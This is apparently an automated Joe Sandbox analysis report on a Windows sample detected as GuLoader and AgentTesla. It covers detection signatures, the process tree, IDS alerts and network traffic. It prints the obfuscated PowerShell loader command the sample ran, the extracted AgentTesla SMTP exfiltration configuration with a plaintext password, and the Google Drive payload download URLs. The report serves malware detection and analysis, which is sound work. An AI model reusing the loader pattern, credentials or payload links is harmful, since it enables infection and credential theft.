Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ulf4JrCRk2.exe

Overview

General Information

Sample name:ulf4JrCRk2.exe
renamed because original name is a hash value
Original sample name:26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c.exe
Analysis ID:1549408
MD5:a8a9f68888009bf9737238846f3b6ec3
SHA1:328fc40462eca7d498bfe67b17a01a1ff009796b
SHA256:26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ulf4JrCRk2.exe (PID: 3868 cmdline: "C:\Users\user\Desktop\ulf4JrCRk2.exe" MD5: A8A9F68888009BF9737238846F3B6EC3)
    • powershell.exe (PID: 2804 cmdline: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 764 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.1569897869.000000000A302000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: msiexec.exe PID: 764JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries
              Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 216.58.206.46, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49879
              Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 208.91.199.223, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49933
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ulf4JrCRk2.exe", ParentImage: C:\Users\user\Desktop\ulf4JrCRk2.exe, ParentProcessId: 3868, ParentProcessName: ulf4JrCRk2.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", ProcessId: 2804, ProcessName: powershell.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T16:10:05.747802+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949795TCP
              2024-11-05T16:10:43.237145+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949977TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T16:09:44.203457+010020301711A Network Trojan was detected192.168.2.949933208.91.199.223587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T16:10:30.808031+010028555421A Network Trojan was detected192.168.2.949933208.91.199.223587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T16:10:30.808031+010028552451A Network Trojan was detected192.168.2.949933208.91.199.223587TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-05T16:09:44.203457+010028400321A Network Trojan was detected192.168.2.949933208.91.199.223587TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: powershell.exe.2804.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}
              Source: ulf4JrCRk2.exeReversingLabs: Detection: 15%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: ulf4JrCRk2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49879 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49889 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49913 version: TLS 1.2
              Source: ulf4JrCRk2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb54= source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: re.pdbKN source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb! source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00405FF5 FindFirstFileA,FindClose,0_2_00405FF5
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055B1

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.9:49933 -> 208.91.199.223:587
              Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49933 -> 208.91.199.223:587
              Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.9:49933 -> 208.91.199.223:587
              Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.9:49933 -> 208.91.199.223:587
              Source: global trafficTCP traffic: 192.168.2.9:49933 -> 208.91.199.223:587
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 208.91.199.223 208.91.199.223
              Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
              Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
              Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: ip-api.com
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49795
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49977
              Source: global trafficTCP traffic: 192.168.2.9:49933 -> 208.91.199.223:587
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: smtp.santonswitchgears.com
              Source: powershell.exe, 00000002.00000002.1555618352.00000000029B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: ulf4JrCRk2.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: ulf4JrCRk2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.santonswitchgears.com
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
              Source: powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: msiexec.exe, 00000005.00000002.2614911399.00000000083BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 00000005.00000002.2614911399.000000000837A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2614850172.0000000008320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do
              Source: msiexec.exe, 00000005.00000002.2614911399.00000000083EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
              Source: msiexec.exe, 00000005.00000002.2614911399.00000000083BF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download
              Source: msiexec.exe, 00000005.00000002.2614911399.00000000083D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1gAzexzfPzo9JKAkR34weoW4e3MtgO3do&export=download3-
              Source: powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49879 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.9:49889 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49913 version: TLS 1.2
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040511A
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_004049590_2_00404959
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_004062CB0_2_004062CB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0456E3E02_2_0456E3E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E3E7585_2_02E3E758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E34AC05_2_02E34AC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E3D7705_2_02E3D770
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E341F05_2_02E341F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E33EA85_2_02E33EA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26ABE8285_2_26ABE828
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26AB59D85_2_26AB59D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26ABAC985_2_26ABAC98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26AB8EF05_2_26AB8EF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26AB00405_2_26AB0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26AB87D85_2_26AB87D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26AB33005_2_26AB3300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26ABB3785_2_26ABB378
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_26AB00115_2_26AB0011
              Source: ulf4JrCRk2.exeStatic PE information: invalid certificate
              Source: ulf4JrCRk2.exe, 00000000.00000000.1345172785.0000000000447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedracma afsoner.exeN vs ulf4JrCRk2.exe
              Source: ulf4JrCRk2.exeBinary or memory string: OriginalFilenamedracma afsoner.exeN vs ulf4JrCRk2.exe
              Source: ulf4JrCRk2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/11@5/5
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040442A
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeFile created: C:\Users\user\AppData\Roaming\supersystemJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeFile created: C:\Users\user\AppData\Local\Temp\nsk335C.tmpJump to behavior
              Source: ulf4JrCRk2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ulf4JrCRk2.exeReversingLabs: Detection: 15%
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeFile read: C:\Users\user\Desktop\ulf4JrCRk2.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ulf4JrCRk2.exe "C:\Users\user\Desktop\ulf4JrCRk2.exe"
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: wintypes.dllJump to behavior
